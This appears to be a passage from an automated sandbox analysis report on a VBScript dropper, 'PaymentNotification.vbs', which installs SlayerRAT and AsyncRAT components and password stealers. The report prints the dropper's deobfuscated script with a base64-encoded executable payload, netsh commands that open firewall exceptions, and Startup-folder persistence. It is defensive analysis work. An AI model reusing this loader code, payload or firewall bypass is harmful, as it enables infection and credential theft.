Source: pgr.exe, 00000002.00000002.611403829.00000000039DF000.00000004.00000001.sdmp, tmpFB21.tmp.exe, 0000000D.00000002.599349965.00000000008A2000.00000002.00020000.sdmp, vbc.exe, 0000000F.00000002.518251485.0000000000400000.00000040.00000001.sdmp, tmpFB21.tmp.exe.2.dr Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
Source: pgr.exe, 00000002.00000002.611403829.00000000039DF000.00000004.00000001.sdmp, tmpFB21.tmp.exe, vbc.exe, 0000000F.00000002.518251485.0000000000400000.00000040.00000001.sdmp, tmpFB21.tmp.exe.2.dr Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
Source: pgr.exe, 00000002.00000002.611403829.00000000039DF000.00000004.00000001.sdmp, tmpFB21.tmp.exe, vbc.exe, 0000000F.00000002.518251485.0000000000400000.00000040.00000001.sdmp, tmpFB21.tmp.exe.2.dr Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: pgr.exe, 00000002.00000002.611403829.00000000039DF000.00000004.00000001.sdmp, tmpFB21.tmp.exe, vbc.exe, 0000000F.00000002.518251485.0000000000400000.00000040.00000001.sdmp, tmpFB21.tmp.exe.2.dr Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: pgr.exe, 00000002.00000002.611403829.00000000039DF000.00000004.00000001.sdmp, tmpFB21.tmp.exe, vbc.exe, 0000000F.00000002.518251485.0000000000400000.00000040.00000001.sdmp, tmpFB21.tmp.exe.2.dr Binary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
Source: PaymentNotification.vbs Virustotal: Detection: 12%
Source: PaymentNotification.vbs ReversingLabs: Detection: 17%
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\PaymentNotification.vbs'
Source: C:\Windows\System32\wscript.exe Process created: C:\Users\user\AppData\Local\Temp\Tmp.exe 'C:\Users\user\AppData\Local\Temp\Tmp.exe'
Source: C:\Windows\System32\wscript.exe Process created: C:\Users\user\AppData\Local\Temp\pgr.exe 'C:\Users\user\AppData\Local\Temp\pgr.exe'
Source: C:\Users\user\AppData\Local\Temp\Tmp.exe Process created: C:\Users\user\AppData\Roaming\servieda.exe 'C:\Users\user\AppData\Roaming\servieda.exe'
Source: C:\Users\user\AppData\Roaming\servieda.exe Process created: C:\Windows\System32\netsh.exe netsh firewall add allowedprogram 'C:\Users\user\AppData\Roaming\servieda.exe' 'servieda.exe' ENABLE
Source: C:\Windows\System32\netsh.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\pgr.exe Process created: C:\Windows\SysWOW64\netsh.exe netsh firewall add allowedprogram 'C:\Users\user\AppData\Local\Temp\pgr.exe' 'pgr.exe' ENABLE
Source: C:\Windows\SysWOW64\netsh.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d4c6a6df7bab3dad31763de990c4ed82.exe 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d4c6a6df7bab3dad31763de990c4ed82.exe'
Source: C:\Users\user\AppData\Local\Temp\pgr.exe Process created: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe 'C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe'
Source: C:\Users\user\AppData\Local\Temp\pgr.exe Process created: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe 'C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe'
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holdermail.txt'
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holderwb.txt'
Source: C:\Windows\System32\wscript.exe Process created: C:\Users\user\AppData\Local\Temp\Tmp.exe 'C:\Users\user\AppData\Local\Temp\Tmp.exe' Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Users\user\AppData\Local\Temp\pgr.exe 'C:\Users\user\AppData\Local\Temp\pgr.exe' Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Tmp.exe Process created: C:\Users\user\AppData\Roaming\servieda.exe 'C:\Users\user\AppData\Roaming\servieda.exe' Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\pgr.exe Process created: C:\Windows\SysWOW64\netsh.exe netsh firewall add allowedprogram 'C:\Users\user\AppData\Local\Temp\pgr.exe' 'pgr.exe' ENABLE Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\pgr.exe Process created: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe 'C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe' Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\pgr.exe Process created: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe 'C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe' Jump to behavior
Source: C:\Users\user\AppData\Roaming\servieda.exe Process created: C:\Windows\System32\netsh.exe netsh firewall add allowedprogram 'C:\Users\user\AppData\Roaming\servieda.exe' 'servieda.exe' ENABLE Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holdermail.txt'
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holderwb.txt'
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe File opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorrc.dll
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
Source: C:\Users\user\AppData\Local\Temp\Tmp.exe File opened: C:\Windows\WinSxS\amd64_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9445_none_88df21dd2faf7c49\MSVCR80.dll Jump to behavior
Source: Binary string: C:\Users\Jovan\Documents\Visual Studio 2010\Projects\Stealer\CMemoryExecute\CMemoryExecute\obj\Release\CMemoryExecute.pdb source: pgr.exe, 00000002.00000002.611403829.00000000039DF000.00000004.00000001.sdmp, tmpFB21.tmp.exe, tmpFB21.tmp.exe.2.dr
Source: Binary string: f:\Projects\VS2005\mailpv\Release\mailpv.pdb source: pgr.exe, 00000002.00000002.611403829.00000000039DF000.00000004.00000001.sdmp, tmpFB21.tmp.exe, vbc.exe, tmpFB21.tmp.exe.2.dr
Source: Binary string: f:\Projects\VS2005\WebBrowserPassView\Release\WebBrowserPassView.pdb source: pgr.exe, 00000002.00000002.611403829.00000000039DF000.00000004.00000001.sdmp, tmpFB21.tmp.exe, vbc.exe, 0000000F.00000002.518251485.0000000000400000.00000040.00000001.sdmp, tmpFB21.tmp.exe.2.dr
Source: Binary string: mscorrc.pdb source: tmpFB21.tmp.exe, 0000000D.00000002.613320606.00000000058C0000.00000002.00000001.sdmp

Data Obfuscation:

barindex
Detected unpacking (overwrites its own PE header)
Source: C:\Users\user\AppData\Local\Temp\Tmp.exe Unpacked PE file: 1.2.Tmp.exe.1d0000.0.unpack
Source: C:\Users\user\AppData\Roaming\servieda.exe Unpacked PE file: 3.2.servieda.exe.a0000.0.unpack
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d4c6a6df7bab3dad31763de990c4ed82.exe Unpacked PE file: 8.2.d4c6a6df7bab3dad31763de990c4ed82.exe.a70000.0.unpack
VBScript performs obfuscated calls to suspicious functions
Source: C:\Windows\System32\wscript.exe Anti Malware Scan Interface: WScript.Sleep(5000)Dim shadow,devpoint,members,ramadanDim ShaDevset hfhejotgbhzlzyohafchtul = createobject("wscript.shell")ShaDev = hfhejotgbhzlzyohafchtul.ExpandEnvironmentStrings("%TEMP%")Set shadow=CreateObject("Msxml2.DOMDocument.3.0").CreateElement("base64")Set members=CreateObject("Msxml2.DOMDocument.3.0").CreateElement("base64")shadow.dataType="bin.base64"members.dataType="bin.base64"'--------------------------------shadow.text="TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDAE4FhmAAAAAAAAAAAOAAAgELAQgAAAgBAAAGAAAAAAAATiYBAAAgAAAAAAAAAABAAAAgAAAAAgAABAAAAAAAAAAEAAAAAAAAAACAAQAAAgAAAAAAAAIAQIUAABAAABAAAAAAEAAAEAAAAAAAABAAAAAAAAAAAAAAAPQlAQBXAAAAAEABAAAEAAAAAAAAAAAAAAAAAAAAAAAAAGABAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAAAAAAAAAAAAAAACCAAAEgAAAAAAAAAAAAAAC50ZXh0AAAAVAYBAAAgAAAACAEAAAIAAAAAAAAAAAAAAAAAACAAAGAucnNyYwAAAAAEAAAAQAEAAAQAAAAKAQAAAAAAAAAAAAAAAABAAABALnJlbG9jAAAMAAAAAGABAAACAAAADgEAAAAAAAAAAAAAAAAAQAAAQgAAAAAAAAAAAAAAAAAAAAAwJgEAAAAAAEgAAAACAAUA3LwAABhpAAABAAAAWQAABiS8AAC4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACYCKAEAAAoAACoAACoAAigFAAAKAAAqANJzBwAACoABAAAEcwgAAAqAAgAABHMJAAAKgAMAAARzCgAACoAEAAAEcwsAAAqABQAABAAqAAAAEzABABAAAAABAAARAH4BAAAEbwwAAAoKKwAGKhMwAQAQAAAAAgAAEQB+AgAABG8NAAAKCisABioTMAEAEAAAAAMAABEAfgMAAARvDgAACgorAAYqEzABABAAAAAEAAARAH4EAAAEbw8AAAoKKwAGKhMwAQAQAAAABQAAEQB+BQAABG8QAAAKCisABiobMAQAFAEAAAYAABEAAowGAAAbLBIPAP4WBgAAG28VAAAKLQMWKwEXABMEEQQ55gAAAH4GAAAEFP4BFv4BEwURBSwzfgYAAATQBgAAGygWAAAKbxcAAAoTBhEGLBZyAQAAcBaNEwAAASgYAAAKcxkAAAp6ACsLAHMaAAAKgAYAAAQAfgYAAATQBgAAGygWAAAKFG8bAAAKAAAoAQAAKwrefd5ydQ8AAAElLQQmFisWJQwoHQAACghvHgAAChT+ARb+ARb+A/4RJnI7AABwF40TAAABDQkWCG8eAAAKbx8AAAqiAAkoGAAACgsHCG8eAAAKcyAAAAp6KCEAAAreFwB+BgAABNAGAAAbKBYAAApvIgAACgDcACsFAAIKKwEABioBHAAAAQCNAAq7ADeXAAAAAgCNAGXyABcAAAAAEzACAB8AAAAHAAARAAP+FgYAABtvIwAACgADEgD+FQYAABsGgQYAABsAKgAqAAIoJAAACgAAKgATMAIAEgAAAAgAABEAAgMoJQAACigmAAAKCisABioAABMwAQAMAAAACQAAEQACKCcAAAoKKwAGKhMwAQAQAAAACgAAEQDQBQAAAigWAAAKCisABioTMAEADAAAAAsAABEAAigoAAAKCisABioTMAIAEgAAAAgAABEAAgMoJQAACigmAAAKCisABioAABMwAQAMAAAACQAAEQACKCcAAAoKKwAGKhMwAQAQAAAACgAAEQDQBgAAAigWAAAKCisABioTMAEADAAAAAsAABEAAigoAAAKCisABioTMAIAIAAAAAwAABEAAowGAAAbFP4BCwcsCigBAAArCisIKwUAAgorAQAGKhMwAgASAAAABwAAEQADEgD+FQYAABsGgQYAABsAKgAAKgACKCQAAAoAACoAEzACACYAAAANAAARAH4rAAAKjAgAABsU/gELBywKKAIAACuAKwAACn4rAAAKCisABioAACoAAigkAAAKAAAqADJzNgAABoAJAAAEACoAAAAmAigkAAAKAAAqAAATMAIAtQMAAA4AABEAcnEAAHAoLQAAChMTFhMSKxQRExESmgoGby4AAAoAERIX1hMSABESEROOt/4EEzYRNi3ecoEAAHAoLQAAChMVFhMUKxYRFREUmhMKEQpvLgAACgARFBfWExQAERQRFY63/gQTNhE2LdxykwAAcCgtAAAKExcWExYrFhEXERaaEwsRC28uAAAKABEWF9YTFgARFhEXjrf+BBM2ETYt3HKnAABwKC0AAAoTGRYTGCsWERkRGJoTDBEMby4AAAoAERgX1hMYABEYERmOt/4EEzYRNi3ccrsAAHAoLQAAChMbFhMaKxYRGxEamhMNEQ1vLgAACgARGhfWExoAERoRG463/gQTNhE2LdxyzQAAcCgtAAAKEx0WExwrFhEdERyaEw4RDm8uAAAKABEcF9YTHAARHBEdjrf+BBM2ETYt3HLhAABwKC0AAAoT
.NET source code contains potential unpacker
Source: Tmp.exe.0.dr, SlayerRAT.cs .Net Code: Plugin System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: servieda.exe.1.dr, SlayerRAT.cs .Net Code: Plugin System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 1.0.Tmp.exe.1d0000.0.unpack, SlayerRAT.cs .Net Code: Plugin System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 1.2.Tmp.exe.1d0000.0.unpack, SlayerRAT.cs .Net Code: Plugin System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 79c06ef4ef423d882819c4e66285ec85.exe.2.dr, OK.cs .Net Code: Plugin System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 2.2.pgr.exe.80000.0.unpack, OK.cs .Net Code: Plugin System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 2.0.pgr.exe.80000.0.unpack, OK.cs .Net Code: Plugin System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: d4c6a6df7bab3dad31763de990c4ed82.exe.3.dr, SlayerRAT.cs .Net Code: Plugin System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 3.2.servieda.exe.a0000.0.unpack, SlayerRAT.cs .Net Code: Plugin System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 3.0.servieda.exe.a0000.0.unpack, SlayerRAT.cs .Net Code: Plugin System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 8.2.d4c6a6df7bab3dad31763de990c4ed82.exe.a70000.0.unpack, SlayerRAT.cs .Net Code: Plugin System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Contains functionality to dynamically determine API calls
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 14_2_00403C3D LoadLibraryA,GetProcAddress,strcpy, 14_2_00403C3D
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\AppData\Local\Temp\pgr.exe Code function: 2_2_00085021 push cs; ret 2_2_00085022
Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe Code function: 12_2_006E2A66 push 0000003Eh; retn 0000h 12_2_006E2DC0
Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe Code function: 12_2_006E4122 push eax; ret 12_2_006E412C
Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe Code function: 12_2_006E2F81 push eax; ret 12_2_006E2F95
Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe Code function: 12_2_006E7196 push cs; iretd 12_2_006E7202
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Code function: 13_2_00910712 push eax; ret 13_2_00910726
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Code function: 13_2_00910712 push eax; ret 13_2_0091074E
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Code function: 13_2_008EBA9D push eax; ret 13_2_008EBAB1
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Code function: 13_2_008EBA9D push eax; ret 13_2_008EBAD9
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Code function: 13_2_0102A16B push cs; retf 13_2_0102A183
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Code function: 13_2_0102A083 push cs; retf 13_2_0102A09B
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Code function: 13_2_0102A0F7 push cs; retf 13_2_0102A10F
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 14_2_00411879 push ecx; ret 14_2_00411889
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 14_2_004118A0 push eax; ret 14_2_004118B4
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 14_2_004118A0 push eax; ret 14_2_004118DC

Persistence and Installation Behavior:

barindex
Drops PE files
Source: C:\Users\user\AppData\Local\Temp\Tmp.exe File created: C:\Users\user\AppData\Roaming\servieda.exe Jump to dropped file
Source: C:\Windows\System32\wscript.exe File created: C:\Users\user\AppData\Local\Temp\Tmp.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\pgr.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\79c06ef4ef423d882819c4e66285ec85.exe Jump to dropped file
Source: C:\Users\user\AppData\Roaming\servieda.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d4c6a6df7bab3dad31763de990c4ed82.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\pgr.exe File created: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Jump to dropped file
Source: C:\Windows\System32\wscript.exe File created: C:\Users\user\AppData\Local\Temp\pgr.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\pgr.exe File created: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe Jump to dropped file

Boot Survival:

barindex
Yara detected AsyncRAT
Source: Yara match File source: 0000000C.00000000.429733559.00000000006E2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.599252774.00000000006E2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.601243946.0000000002AF1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: tmp87E4.tmp.exe PID: 5036, type: MEMORY
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe, type: DROPPED
Source: Yara match File source: 12.0.tmp87E4.tmp.exe.6e0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.tmp87E4.tmp.exe.6e0000.0.unpack, type: UNPACKEDPE
Drops PE files to the startup folder
Source: C:\Users\user\AppData\Local\Temp\pgr.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\79c06ef4ef423d882819c4e66285ec85.exe Jump to dropped file
Source: C:\Users\user\AppData\Roaming\servieda.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d4c6a6df7bab3dad31763de990c4ed82.exe Jump to dropped file
Creates a start menu entry (Start Menu\Programs\Startup)
Source: C:\Users\user\AppData\Local\Temp\pgr.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\79c06ef4ef423d882819c4e66285ec85.exe Jump to behavior
Stores files to the Windows start menu directory
Source: C:\Users\user\AppData\Local\Temp\pgr.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\79c06ef4ef423d882819c4e66285ec85.exe Jump to behavior
Source: C:\Users\user\AppData\Roaming\servieda.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d4c6a6df7bab3dad31763de990c4ed82.exe Jump to behavior

Hooking and other Techniques for Hiding and Protection:

barindex
Changes the view of files in windows explorer (hidden files and folders)
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Key value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced Hidden
Extensive use of GetProcAddress (often used to hide API calls)
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 14_2_0040F64B memset,strcpy,memset,strcpy,strcat,strcpy,strcat,GetModuleHandleA,LoadLibraryExA,GetModuleHandleA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 14_2_0040F64B
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Windows\System32\wscript.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Tmp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Tmp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Tmp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Tmp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Tmp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Tmp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Tmp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Tmp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Tmp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Tmp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Tmp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Tmp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Tmp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Tmp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Tmp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Tmp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Tmp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Tmp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Tmp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Tmp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Tmp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Tmp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Tmp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Tmp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\pgr.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\pgr.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\pgr.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\pgr.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\pgr.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\pgr.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\pgr.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\pgr.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\pgr.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\pgr.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\pgr.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\pgr.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\pgr.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\pgr.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\pgr.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\pgr.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\pgr.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\pgr.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\pgr.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\pgr.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\pgr.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\pgr.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\pgr.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\pgr.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\pgr.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\pgr.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\pgr.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\pgr.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\pgr.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\pgr.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\pgr.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\pgr.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\pgr.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\pgr.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\pgr.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\pgr.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\pgr.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\pgr.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\pgr.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\pgr.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\pgr.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
